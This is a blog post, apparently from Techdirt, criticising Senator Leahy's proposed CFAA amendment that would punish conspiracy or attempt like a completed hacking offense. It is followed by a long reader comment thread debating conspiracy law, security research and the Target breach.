Senator Leahy Tries To Sneak Through Plans To Make Merely Talking About Computer Hacking A Serious Crime

from the that's-not-good dept

You may have heard about the recent high-profile, malicious hack of Target's point of sale systems, giving the attackers access to the details of at least 40 million credit cards. Senator Patrick Leahy is, incredibly cynically, using this news event to try to sneak through a change to the "anti-hacking" law, the CFAA, which was used to prosecute Aaron Swartz and many others. And it's not a change to improve that law, but to broaden it, extending massively how the DOJ can charge just about anyone they want with serious computer crimes. This is monumentally bad, and Senator Leahy is trying to hide it behind a major news event because he knows he couldn't get this kind of DOJ wishlist through without hiding it.

Officially, this is Leahy reintroducing his Personal Data Privacy and Security Act -- a bill he's tried to introduce a number of times before. The crux of that bill makes some sense: requiring companies that have had a security breach to inform those who were impacted. State laws (most notably, California's) already include some similar requirements, but this is an attempt to create a federal law on that front. There are some reasonable concerns about such a law, but the general idea of better protecting the public from data breaches, by at least letting them know about it, is an idea worth considering.

The problem is that Leahy has inserted a couple of other dangerous bits and pieces into the bill, including a couple of "reforms" to the parts of the CFAA that have raised significant concerns, and burying them deep within this bill. Section 105 of the bill, for example, simply repeats the same change that the House Judiciary tried to include last year in an attempt at bad CFAA reform. It's basically part of the DOJ's wishlist, changing the CFAA to make you guilty of violating the law if you merely "conspire or attempt to commit" the offense, rather than if you actually do commit the offense. It may be difficult to understand if you just read the proposed bill (this is on purpose), but the bill says it wants to include the term "for the completed offense" so that the CFAA now reads:

Whoever conspires to commit or attempts to commit an offense under subsection (a) of this section shall be punished as provided for the completed offense in subsection (c) of this section.

Right now, the law does not include those four words. Why is that a big change? As we explained last year:

All they did was add the "for the completed offense," to that sentence. That may seem like a minor change at first, but it would now mean that they can claim that anyone who talked about doing something ("conspires to commit") that violates the CFAA shall now be punished the same as if they had "completed" the offense. And, considering just how broad the CFAA is, think about how ridiculous that might become.

While the proposed bill does include a further change that notes that merely violating a terms of service agreement does not make you subject to the CFAA, it's not just the TOS issue that concerns so many people about the CFAA.

The CFAA needs to be greatly scaled back, not expanded, no matter what the DOJ wants. It's ridiculous that Senator Leahy is not only proposing this, but then trying to hide it in this bill about security breach reporting, tying it to a news event.

This is insane, this would make something as simple as reading the JavaScript on a page that has to do with login or auth or using a tool like Fiddler to look at your own web traffic potentially illegal actions. Not to mention completely killing white and grey hat security research completely. That's awesome, this is like taking all the guns away from law abiding folks, only the black hats will be able to research security holes and thus have the guns to exploit them.

What a monumentally stupid idea introduced by a monumentally stupid Luddite.

So if Joe User is clicking around on his banking website one day and discovers - inadvertently or otherwise - a security hole big enough to drive a truck through, just pointing that security hole out to the bank will be a criminal offense on par with actually exploiting it. I mean, obviously that's already happening in many cases, but to have such insanity codified into law means that there is no incentive whatsoever to inform the bank of the flaw.

Not really

> but it would now mean that they can claim that anyone who talked about doing something ("conspires to commit") that violates the CFAA shall now be punished the same as if they had "completed" the offense

That's a bit misleading. Merely talking about something isn't the same as conspiring to do it. First of all, a conspiracy requires two or more people, so someone merely writing a blog post about computer hacking, for example, wouldn't qualify. Second, conspiracy requires an "overt act in furtherance of the conspiracy" in order for it to be complete and prosecutable, so not only do you have to plan to commit the crime with other people, you also have to take an affirmative step toward implementing that plan. It's not merely "talking about it" as the article states.

Re:

All "conspiracy to commit" laws are questionable

All such laws are highly questionable, and I strongly oppose any effort to add to them.

For a real-world example from a number of years ago, it's a felony to get together with a few friends and plan a bank robbery -- even if we have no intention whatsoever of actually committing the robbery. The people who did this not only didn't commit a robbery, they very clearly engaged in the planning purely as an intellectual exercise.

This seems to be blatantly unconstitutional on free speech grounds alone.

I could (grudgingly) get behind "conspiracy to commit" charges as add-ons to a real crime that was actually committed, much like the hate speech laws, but that's as far as it should go.

what IS NOT SAID.

For a few reasons, target does not say HOW(wireless, networked, Internet,???) that there system was taken advantage of..THIS is important, and could tell us if Target was an IDIOT..

If they had a Fairly protected system, it would mean this is an INSIDE job.IF they were like home depot(wireless system)(STUPID) then they needed better protection then they HAD.If they allowed DIRECt access from an internet connection, then they are even more stupid.

Encryption is OK, but giving anyone direct access to the file ITSELF? means only a few people should have access.

for those that dont get it..LEts say you REALLY want to protect a file.1) you can make it NOT listed in the files(invisible)2) you have to know the NAME of the file.. as you cant see it.3)password the file, NOT TO HARD and it can be built into the EDITING program that WORKS with the file.4.)separate files..name file, Data files can be 2-3-4-5 parts, and you get 1, you dont get the others.

Re: Not really

First of all, a conspiracy requires two or more people, so someone merely writing a blog post about computer hacking, for example, wouldn't qualify

Are you sure? A blog post involves two people as soon as someone reads it. Commenting provides interaction, if that's a requirement.

conspiracy requires an "overt act in furtherance of the conspiracy" in order for it to be complete

Yes, but that's an incredibly low bar that is easily satisfied in most completely innocent circumstances. In the bank robbery planning incident I described in another comment here, that condition was satisfied by the fact that the "conspirators" had obtained the building plans for the bank.

If, as often happens in my workplace (a software security company), two developers are discussing how a particular exploit works then example code will certainly be exchanged, and probably written. That would probably satisfy the requirement as well.

Re: Re:

By telling the bank "I could easily steal millions of dollars from you, so could anyone else. You've got this big security flaw on your website that anyone can exploit, please fix it before someone victimizes you. [insert description of flaw]"

You've spoken about breaking into a website and stealing money from it. That's now a crime.

Re:

iT KINDA DOES..If you leave your door open, and a thief walks ina nd steals things..IS HE, breaking and entering?He may have entered, but you left it open..IS it hacking if they DONT protect themselves??

AS WELL AS THE WORD hacking isnt used properly..DID they hack anything? If it was an ADMIN, it wasnt a HACK.

Re: Re: Re: Re:

"Whoever conspires to commit or attempts to commit an offense under subsection (a) of this section shall be punished as provided for the completed offense in subsection (c) of this section. "

If one is looking for security vulnerabilities, that is attempting. If I find one by accident and report it that could easily be twisted into a conspiracy. "Your Honor this man wanted to embarrass the bank so he conspired to find security issues"

Re: Re: Not really

Re: Re: Re: Re:

"The bill also includes the Obama administrationís proposal to update the Computer Fraud and Abuse Act, so that attempted computer hacking and conspiracy to commit computer hacking offenses are subject to the same criminal penalties, as the underlying offenses."-- Quote from the letter

What that means is that informing them of the flaw could very well mean that the bank could accuse you of hacking. I.E. GeoHot was accused of hacking his Playstation 3, that he even bloody well owned, by Sony under CFAA.

Re: Re:

As others have said, the legal definition of "conspiring" is broad enough to encompass simply talking about an act, despite your apparent belief to the contrary. In addition, the fact that people are already being prosecuted for this very thing* makes me think that specifically beefing up that part of the Act is intending exactly this.

*If you don't know what cases I'm talking about here you're not informed enough to even argue the point.

Re: what IS NOT SAID.

"(wireless system)(STUPID)"

What makes wireless stupid?Data is transmitted from point A to point B.It is the job of point A and point B to:1. Validate they are communicating with the real endpoint2. Encrypt their communications to prevent eavesdropping

If the communicating parties are doing those two things then it does not matter if you are using wired, wireless, snail mail, smoke signals or whatever.

Fail at either of those things and you are vulnerable on a wired or wireless network.

It's basically part of the DOJ's wishlist, changing the CFAA to make you guilty of violating the law if you merely "conspire or attempt to commit" the offense, rather than if you actually do commit the offense.

It's about time to change the name of the DOJ to DOI. Since Eric the Nazi took over as AG, the DOJ has been acting more like the Department of Injustice than the former.

"Whoever conspires to commit an offense shall be punished as provided for the completed offense"

Consider committing a crime, be punished as if you'd actually done the crime.Just when you didn't think America could get any more dystopian, the Senate is now voting on whether to start having people arrested for thoughtcrime.

Re: Re: Re:

Re: Not really

I don't know if it changes the definition of the crime. The problem is that the punishment for the more active forms of intent is now exactly the same as actually hacking. It is a sad society to live in if punishment for conspiracy to commit murder is the same as a first degree murder...

About the overt act, it seems that it can be ignored as a requirement in some cases like drug enforcement.

From the SCOTUS judgement in US vs Shabani:The Court ruled: "...Congress intended to adopt the common law definition of conspiracy, which does not make the doing of any act other than the act of conspiring a condition of liability..."

Re: Re: Re: Re: Re: Re:

Security researchers do not operate in their own little bubble. If you find an exploitable weakness and discuss it with other researchers or knowledgeable people, and then later on do something to attract the DoJ's attention, their history would indicate your discussions could quite easily be turned into 'conspiring' in order to threaten you with serious charges.

Remember, we're not talking about common-sense interpretations here, but about how the laws can be and have been twisted by the DoJ for their own purposes, like making heavy-handed threats as part of a plea bargain.

Re: Re: Re: Not really

You don't necessarily need to be found guilty of such an act of conspiracy, you merely have to be threatened by these serious charges in order to make to take a plea deal. Techdirt and others have covered this tactic quite extensively. A law like this would give the DoJ the ability to make even scarier threats, and increase the chances of innocent people pleading guilty to a lesser offence to avoid the possibility, however unlikely, of being found guilty of a much more serious crime.

Re:

I'm guilty then. I use GreaseMonkey. Therefore I'm guilty for violating this on my home pc. Of course then he would be guilty as well. "Hey, You have a trojan on your gov't issued laptop!" Opps, forgot. You work for the gubbermint. You're innocent.

Re: Re: Not really

> The Court ruled: "...Congress intended to> adopt the common law definition of conspiracy,> which does not make the doing of any act other> than the act of conspiring a condition of> liability..."

That is asinine and flies in the face of reality. The federal conspiracy statute (18 USC 371) reads:

If two or more persons conspire either to commit any offense against the United States, or to defraud the United States, or any agency thereof in any manner or for any purpose, and one or more of such persons do any act to effect the object of the conspiracy, each shall be fined under this title or imprisoned not more than five years, or both.

Since the statute ACTUALLY SAYS that an overt act is required, it beggars the imagination how the Court can claim that Congress didn't intend to include that in the law.

This is just another example of the Court making shit up based on its own agenda and claiming words don't mean what they say, or mean the opposite of what they say, or whatever it takes to justify the result the Court wants, rather than what the law requires.

Conspiracy

> Consider committing a crime, be punished> as if you'd actually done the crime. Just> when you didn't think America could get any> more dystopian, the Senate is now voting> on whether to start having people arrested> for thoughtcrime.

So many people in this thread are acting like this is something new. The conspiracy offense has been a part of federal law for a century or more. Just because it's now being applied to computer/tech offenses doesn't make it some novel attempt to create a dystopian nightmare.

Re:

But do you have the funds to fight it if someone decides to use the law in that manner?

The laws in the US have 2 faces now. One that is easy for the average person to see and understand, and another distorted face that serves a purpose that the people who wrote the law really wanted in their toolbelt.

You know what I find insanely stupid in all this? There is no requirement that if the federal government gets hacked they have to tell anyone anything. Nor if you look does it include the federal government in this bill. This bill is about states.

Given the reports about ACA (Obamacare) having never been built with security in mind, this becomes seriously important. In order to sell ACA this particular topic has been sidelined into silence. And what about the NSA gathering up all this data and then turning it over to other agencies with the admonishment they can't be used as the source? Given their tools, that is hacking; dishing out malware at targeted computers/individuals.

Senator Leahy once again shows his real colors in all this. It's about covering the governments ass not about security. When you can't find another charge, claim conspiracy to hack as a catch all dealing with computers. This makes me very uneasy. I use element Q to get rid of annoying javascript and other undesirable items on web pages I view. It does nothing to the original site, as all changes are temporary and on my computer only. Removing blocks to view the public site until you activate javascript doesn't float. Yet it is likely under prosecutor expansion it could one day be illegal with this vague law.

Re: Re: Re:

Jackn, you have no clue what you're talking about. Reading this comment and the ones before makes it quite clear that you don't know anything about security or computers.

You can password protect individual files and have the editing software support the encryption. Adobe Acrobat does that, Microsoft Office does that, good database software can do that. Hell, Windows (pro and up) itself supports that.

Re: Re:

The laws in the US have 2 faces now. One that is easy for the average person to see and understand, and another distorted face that serves a purpose that the people who wrote the law really wanted in their toolbelt.

Sen. Leahy is also the one introducing the USA FREEDOM Act, in order to scale back unconstitutional spying. Yet, he introduces dangerous changes to the CFAA that allows people to be charged with a crime they have yet to commit.

This just goes to show you can never trust a politician, because the vast majority of them are two faced deceivers. The most "transparent" administration ever, the Obama administration, is proof of how two faces politicians are.

Re: Conspiracy

There's some truth to this. It's like in Men In Black, where Agent J was shocked to learn that a spaceship was getting ready to destroy Earth, and Agent K told him that there's ALWAYS something out there preparing to destroy Earth.

But that doesn't mean you shouldn't get angry and mobilize when you happen to hear about these things, or even stop talking about what could happen if you don't remind the government who's actually supposed to be running this country.

Re: Re: Re: Re:

I think you're misunderstanding what he's saying.

You don't need to agree with the conclusion he draws but if you don't even know the cases generally used as relevant legal precedent in these situations then you're not informed enough to argue legal matters.

Re:

"Yet, he introduces dangerous changes to the CFAA that allows people to be charged with a crime they have yet to commit."

Actually, conspiracy to commit a crime is often a crime in and of itself. It's why you can arrest someone for hiring a hitman before the target gets killed, because it's a conspiracy to commit murder (I know, a big example, but there ya go).

Conspiring with others to hack into a network to obtain material illegally should be a crime. It wouldn't harm white hat hackers trying to show a problem, but it would sure screw up black hatters planning their next break in.

Re: Re: Re: Re: Re:

Dear Jack..Giving wireless access or internet Access to ROOT, BASe commands is a REAL sec. threat.Giving Full control for any remote access should be forbidden..How stupid do these people seem.

Any commercial business wishes to see Every transaction and Action done in the store. its the only way to protect themselves, and see WHO DID WHAT..and WHOM to blame.If they did, even BASIC, security and tricks, the ONLY way to have full access to this file, is to KNOW the name of it and have the password to open it.thats why information is important..HOW did they get the files.IF they had basic sec. then it had to be someone with access.

ALSO, there are many ways to hide files. 1 uses control characters in the name, which will list the DIR, but the name is blank. it erases itself, and unless you have a HEX dump of the DIR you will NEVER see the name.The OLD ways still work..HOw do you think we hacked int he OLD days..HEX editors RULE..

Mike, you seem to be misunderstanding what the bill says, or what current law says. Or both. Those words don't change what acts are criminal at all. They don't make things into crimes that aren't criminal as the law now stands. They just change the maximum possible punishment, from 5 years (the punishment for conpiracy ) to 5 or 10 or 15 years or more under the CFAA. I'm sure you think that's a bad idea too , but it is a completely different bad idea from the one your post seems to have invented based on some misreading of the statute.

Re: Not really

I am afriad they have the legal precdent for merely making talking about comething without doing it illetgal When Hal Turner was prosecuted for "threatening" federal judges, it shld be noted that he did not say he was going to kill those judges, nor did he tell anyone to. He just merely offered an opinion.

Under this CFAA change, making saying that someone deserves to have their computer hacked, without actually doing it, or telling someone to dot it, would also be a a criminal offence.

They way I see this, this could put ISPs in a damned-if-you-do, damned if you don't sitaution once TPP is implemeneted. They could be in violation of the CFAA if they do monitor users for copyright violations, and violations of copyright laws of theuy dont.

Between this and TPP, it could force nearly every internet company out of business, if you cannot obey the laws that will result from TPP, without violating the CFAA.

The way this law is written, half the student body where I went to community college in the late 1980s would have been felons, if this had been law them, because of a few things we did to circumvent disk quotas.

Courtroom Hillarity

So wouldn't that mean that under that utterly idiotic law it is ironically nearly impossible to convict someone for hacking? I mean in order to prosecute you they'd need to talk about computer hacking. Therefore you can attempt to have the prosecutor prosecuted for violating the law when he attempts to prosecute you.

Re:

If simply discussing hacking is the same as actually doing it, then the DOJ would be unable to hold briefings or meetings internally to discuss hacking countermeasures without running afoul of the law...not that they'd ever hold themselves to the standards they apply to everyone else.

Conspiracy means.....

Though I am totally against anything that would tend to restrict our freedoms in any way more than they have already been post-9/11, I have to question the interpretation of this law. Leahy has always been a strong advocate of personal rights and his insidious planning as limned here is something that would be completely out of character, if it were true. But the word "conspiracy" makes it all quite different from the knee-jerk interpretation. Talking about or discussing something is not conspiracy. Even discussing ways of circumventing security without the intention of actually doing it is not conspiracy, either. Conspiracy has always been a difficult thing to prove in court, as it should be, and I have no doubt, will continue to be.

Re:

Who didn't vote for the Patriot Act? If you remember the time well, you would most likely have accused him of treason if he had not voted for it at the time. Everyone was gung-ho, and even then I had the feeling that it was too much, too fast.

Re: Conspiracy

Agreed. It is an effort to have the tools to actually prevent the breeches before they happen instead of just trying to clean up the mess afterward. "Conspiracy" is something always difficult to prove and involves a lot more than just "talking about" the security in question.

Re: Re: what IS NOT SAID.

Wireless in general is not stupid, however it presents security problems that are not solved if you just use off-the-shelf consumer equipment without adding additional precautions (such as a VPN).

Wireless broadcasts all of your communications over radio, where it is easily listened to by anybody within range. Also, it's like placing a network port on the outside of your house -- anyone can plug into it.

The built-in, standard security measures (WPA) are insufficient against anybody of more skill than a script kiddie (and, these days not even against them).

It's not stupid to use such equipment. It is naive and dangerous to use such equipment while believing that it is secure, unless you've taken additional steps to harden everything.

Re: Re: Re: Not really

This is one definition from one section of one law. "Conspiracy" does not have a monolithic definition. And as far as the overt act goes, simply buying a notebook at a dollar store to keep track of the plan is and act toward effecting the object of the conspiracy, so neither adds nor subtracts substantially from the original view.

Re: Re: Re: Re:

I possess programs that will crack the password locks on zip files, PDF files, Office files, and more in less than a second. Relying on those mechanisms to protect your data is as useful as locking your screen door.

Re: Conspiracy

Just because it's now being applied to computer/tech offenses doesn't make it some novel attempt to create a dystopian nightmare.

You're right, conspiracy laws are nothing new. However, the CFAA is already a dystopian nightmare. I think the reaction is that adding the ability to bring conspiracy charges on top of it will just make everything that much worse.

Re: what IS NOT SAID.

Only a few people should have access to the file? What use would the file have if no one could use it for sales, the reason it exists in the first place? EVERYONE needs access to the file by some method. When you lock people out too tightly, you also lock yourself in.

And as far as wired/wireless, it makes no difference whatever. It's surprising that you actually think that it would. But then your suggested methods of supposedly hiding files are all well-known, sophomoric, and as easy to get around as turnstyles to jump over. You really need better security than something a 4th-grader could come up with.

Re: Re: Re: Re: Re:

I wonder how target stored their detailed transaction data. Probably PDF or excel. I think that could handle 70 million records. Indexing is probably really slow though. Maybe they store their trans data in a zipped pdf. No wonder it takes so long for a credit card purchase to go through!

You guys are eye openers. Here i am in my CISSP world making things really difficult when all we need is a hex editior. I wonder if the PCI specs recoginze these methods as appropriate?

Re: Re: Re: Re: Re: Re:

PDF? Excel? Are you kidding me? I think I'm getting dizzy. And the DMV, too? And do you think that retrieving that data requires a search or something and that is why you mention the time?

There is a thing called a "database". It is ofetn huge. Like the Windows registry. Access is immediate and direct to each piece of data - no search, no following some path to get to it, no change in access time regardless of size. Databases have been around quite a long time.

Re: Re: Not really

When you said:

"If, as often happens in my workplace (a software security company), two developers are discussing how a particular exploit works then example code will certainly be exchanged, and probably written. That would probably satisfy the requirement as well."

No. It does not satisfy that requirement. People discussing something in the workplace related to their legal employment would not qualify as conspirators to an illegal activity.

Re: Re: Re:

No. By telling the bank you could steal is not a crime.

The whole point of Leahy's proposal is that crimes committed over the Internet are often carried about by organized groups of individuals. Each individual is contributing to the crime. When caught some individuals are able to make the case that even though their actions contributed or facilitated the crime; they not commit the charged top act.

For example someone could claim "I broke a window.". Another person climbed through that window and robbed the premises. Both parties contributed to the crime.

Re: Re: Re: Not really

Re: Re: Re: Re: Re: Re:

Target, like anybody else that has a huge database they need to access quickly, stores their data in a DBMS, such as Access, MySQL, etc. Anything else wouldn't be searchable in a useful way, would take forever to do transactions on, and couldn't be used by thousands of users simultaneously.

Re: Re:

No, not everyone was gung-ho at the time. The Patriot Act was incredibly unpopular in my circles. Not everyone lost their minds.

I thought that every single person who voted for it then (and the renewals since then) shouldn't be trusted to be in government due to either extremely poor judgement or too much of a totalitarian bent.

Re: Conspiracy means.....

The problem is the nexus with the CFAA, which is infamous for being interpreted way beyond reason to imprison people who, at worst, engaged in misdemeanor offenses. Bringing conspiracy into that mix is a pretty clear indicator that "conspiracy" will be used in an overly-broad fashion as well.

Re: Re:

The conspiracy to hack already was a crime, but that's not the problem. The problem is that with the 4 words added to the law, the conspiracy to hack would be treated the same as if you had actually committed the crime.